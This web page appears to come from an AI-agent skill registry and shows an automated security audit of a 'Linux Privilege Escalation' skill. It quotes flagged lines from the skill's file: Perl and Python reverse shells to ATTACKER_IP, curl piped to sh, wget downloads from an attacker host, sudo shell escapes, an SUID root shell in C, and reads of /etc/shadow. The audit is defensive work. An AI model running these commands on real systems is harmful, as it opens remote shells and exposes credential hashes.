Linux Privilege Escalation

Enables systematic privilege escalation assessments on Linux systems to identify and exploit vulnerabilities for root access.

Install this skill

0/100

Security score

The Linux Privilege Escalation skill was audited on Feb 12, 2026 and we found 25 security issues across 4 threat categories, including 10 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 419

Direct command execution function call

SourceSKILL.md

419	perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("

high line 144

Piping content to sh shell

SourceSKILL.md

144	curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \| sh

medium line 227

System command execution

SourceSKILL.md

227	sudo awk 'BEGIN {system("/bin/bash")}'

medium line 230

System command execution

SourceSKILL.md

230	sudo python -c 'import os; os.system("/bin/bash")'

medium line 250

System command execution

SourceSKILL.md

250	system("/bin/bash");

medium line 322

System command execution

SourceSKILL.md

322	/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

medium line 366

System command execution

SourceSKILL.md

366	# Shows: system("service apache2 start")

medium line 386

System command execution

SourceSKILL.md

386	echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c

medium line 230

Python os.system command execution

SourceSKILL.md

230	sudo python -c 'import os; os.system("/bin/bash")'

medium line 322

Python os.system command execution

SourceSKILL.md

322	/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

medium line 413

Python subprocess execution

SourceSKILL.md

413	python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

medium line 163

Wget to non-GitHub URL

SourceSKILL.md

163	wget http://ATTACKER_IP:8000/linpeas.sh

medium line 199

Wget to non-GitHub URL

SourceSKILL.md

199	wget http://ATTACKER_IP/exploit.c

high line 83

Access to /etc/passwd

SourceSKILL.md

83	cat /etc/passwd \| grep -v nologin \| grep -v false

high line 86

Access to /etc/passwd

SourceSKILL.md

86	cat /etc/passwd \| grep home

high line 233

Access to /etc/passwd

SourceSKILL.md

233	sudo less /etc/passwd

high line 293

Access to /etc/passwd

SourceSKILL.md

293	base64 /etc/passwd \| base64 -d > passwd.txt

high line 306

Access to /etc/passwd

SourceSKILL.md

306	# Add to /etc/passwd (using SUID editor)

high line 276

Access to /etc/shadow

SourceSKILL.md

276	LFILE=/etc/shadow

high line 292

Access to /etc/shadow

SourceSKILL.md

292	base64 /etc/shadow \| base64 -d > shadow.txt

high line 471

Access to /etc/shadow

SourceSKILL.md

471	$ base64 /etc/shadow \| base64 -d

low line 163

External URL reference

SourceSKILL.md

163	wget http://ATTACKER_IP:8000/linpeas.sh

low line 199

External URL reference

SourceSKILL.md

199	wget http://ATTACKER_IP/exploit.c

low line 217

External URL reference

SourceSKILL.md

217	Reference https://gtfobins.github.io for exploitation commands:

low line 423

External URL reference

SourceSKILL.md

423	- GTFOBins: https://gtfobins.github.io

Scanned on Feb 12, 2026

View Security Dashboard

Installation guide →

GitHub Stars 106

Rate this skill

Categorydevelopment

UpdatedMay 21, 2026

openclaw backend security-engineer devops-sre backend-developer development

majiayu000/claude-skill-registry